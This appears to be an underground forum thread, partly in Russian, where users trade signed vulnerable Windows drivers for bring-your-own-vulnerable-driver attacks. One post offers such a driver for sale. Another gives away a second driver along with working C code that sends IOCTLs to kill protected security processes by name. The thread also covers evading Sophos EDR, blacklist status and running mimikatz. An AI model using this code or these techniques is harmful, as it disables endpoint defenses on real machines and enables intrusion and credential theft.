Vulnerable Driver

[systemspace]

I've found an exploit in one of drivers of a windows software, which could be possibly used for BYOVD the Driver is signed and the certificate is valid.
Works from Win 7 - 11, both x64 & x86 are supported.
The IOCTL requests sent are unchecked.
There are certain exports one of them is ZwTerminateProcess to perform something like what terminator does.

EDR(Runtime) Results -

Scantime Results -

I can provide video proof upon request in PM.
The driver isn't public from loldriver, github etc...

Looking if someone is interested in buying the driver.

 

[secidiot]

ZwTerminateProcess

От этого нет никакого профита, кроме того что сильно нагружает проц. EDR всеравно не даст запустить mimikatz) Раньше это прокатывало, сейчас уже нет, гайки сильнее закрутили. Тут только свой драйвер писать, проходить сертификацию и тогда можно работать чисто по таргету.
Отдам бесплатно) Его тоже нет на loldrives и на vt fud

// Регистрация дров
currentPid = GetCurrentProcessId();
DeviceIoControl(hDevice, 0x80002010, &currentPid, sizeof(DWORD), NULL, 0, &BytesReturned, NULL);

int findMyProc(const wchar_t** procnames, int num_processes, HANDLE hDevice) {
    HANDLE hSnapshot;
    PROCESSENTRY32 pe;
    int pid = 0;
    DWORD BytesReturned;

    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (INVALID_HANDLE_VALUE == hSnapshot) return 0;

    pe.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hSnapshot, &pe)) {
        CloseHandle(hSnapshot);
        return 0;
    }

    while (true) {
        for (int i = 0; i < num_processes; i++) {
            if (wcscmp(procnames[i], pe.szExeFile) == 0) {
                pid = pe.th32ProcessID;
                // Завершение защищенного процесса
                DeviceIoControl(hDevice, 0x80002048, &pid, sizeof(int), &pid, sizeof(int), &BytesReturned, NULL);
            }
           
        }
        if (!Process32Next(hSnapshot, &pe)) {
            break;
        }
    }

    CloseHandle(hSnapshot);
    return pid;
}

Запускаете драйвер как kernel от админа
Пароль местный

Exploit.IN Send

Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.

send.exploit.in

 

[freeide]

password?

 

[Whisper]

От этого нет никакого профита, кроме того что сильно нагружает проц. EDR всеравно не даст запустить mimikatz) Раньше это прокатывало, сейчас уже нет, гайки сильнее закрутили. Тут только свой драйвер писать, проходить сертификацию и тогда можно работать чисто по таргету.
Отдам бесплатно) Его тоже нет на loldrives и на vt fud
Посмотреть вложение 69700
Скрытое содержимое

Про мимик было смешно.

 

[DoKitO]

password?

its ZAM, not worth spending time on (blacklisted & detected)

 

[secidiot]

Про мимик было смешно.

Чисто для примера взял.

its ZAM, not worth spending time on (blacklisted & detected)

Подпись валид, sophos edr дает дропнуть на диск и запустить в kernel моде.
Сам лично только что проверил.
(На virustotal специально залил для того что б показать что его нет в базах, те что в базах там другая версия драйвера а не эта)

 

[DoKitO]

Чисто для примера взял.

Подпись валид, sophos edr дает дропнуть на диск и запустить в kernel моде.
Сам лично только что проверил.
(На virustotal специально залил для того что б показать что его нет в базах, те что в базах там другая версия драйвера а не эта)
Посмотреть вложение 69953

My bad, good find then